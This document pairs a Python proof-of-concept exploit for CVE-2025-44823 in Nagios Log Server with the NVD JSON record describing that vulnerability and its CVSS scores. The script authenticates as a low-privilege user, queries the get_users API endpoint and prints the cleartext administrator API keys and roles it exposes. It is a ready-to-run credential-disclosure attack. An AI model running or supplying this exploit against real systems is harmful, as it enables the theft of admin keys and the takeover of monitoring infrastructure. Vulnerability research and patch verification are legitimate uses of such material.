CVE-2025-44823

#!/usr/bin/env python3 # CVE-2025-44823 - Nagios Log Server API Key Disclosure PoC # Exploits /api/system/get_users to retrieve plaintext admin API keys import requests import sys import json from urllib.parse import urljoin def exploit(target_url, username, password, verify_ssl=False): """ Exploit CVE-2025-44823 to extract admin API keys from Nagios Log Server. Requires valid low-privilege user credentials. """ session = requests.Session() session.verify = verify_ssl # Step 1: Authenticate to Nagios Log Server login_url = urljoin(target_url, "/nagioslogserver/index.php/login") login_data = { "username": username, "password": password, "login": "Login" } print(f"[*] Authenticating as {username}...") resp = session.post(login_url, data=login_data, allow_redirects=True) if "logout" not in resp.text.lower() and resp.status_code != 200: print("[-] Authentication failed.") return False print("[+] Authentication successful.") # Step 2: Call the vulnerable API endpoint to retrieve user list api_url = urljoin(target_url, "/nagioslogserver/index.php/api/system/get_users") print(f"[*] Requesting user list from {api_url}...") resp = session.get(api_url) if resp.status_code != 200: print(f"[-] Failed to retrieve user list. Status: {resp.status_code}") return False # Step 3: Parse response and extract API keys try: users_data = resp.json() except json.JSONDecodeError: print("[-] Failed to parse JSON response.") return False print(f"[+] Retrieved {len(users_data)} user records.") print("\n[!] Disclosed API Keys:") print("-" * 60) for user in users_data: username_val = user.get("username", user.get("name", "unknown")) api_key = user.get("apikey", user.get("api_key", user.get("apikey", "N/A"))) role = user.get("role", user.get("user_role", "unknown")) if api_key and api_key != "N/A": print(f" User: {username_val}") print(f" Role: {role}") print(f" API Key: {api_key}") print("-" * 60) return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") print(f"Example: {sys.argv[0]} https://nagios.example.com user1 pass123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

{"cve": {"id": "CVE-2025-44823", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:35.070", "lastModified": "2025-11-06T16:41:01.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server before 2024R1.3.2 allows authenticated users to retrieve cleartext administrative API keys via a /nagioslogserver/index.php/api/system/get_users call. This is GL:NLS#475."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "B93D415C-B2C0-42CE-B9B3-29C29A3DCC16"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "997B64B5-A3F2-4D0E-B05E-CCA76D598C18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "D20F6746-83DD-49AE-8C3D-AF2FFB47A89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "5EF32AF5-19EA-495A-AB28-F78F33DDEC3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.2:*:*:*:*:*:*", "matchCriteriaId": "4C26DE7A-37AA-4570-81C1-2E0C1A9026F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3:*:*:*:*:*:*", "matchCriteriaId": "52C22468-A773-49C8-81AD-9B76C26BFFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.1:*:*:*:*:*:*", "matchCriteriaId": "7CEC223A-A3EE-4C51-8B71-E19C73B9215C"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/52177", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.nagios.com/changelog/#log-server", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.exploit-db.com/exploits/52177", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "VDB Entry"]}]}}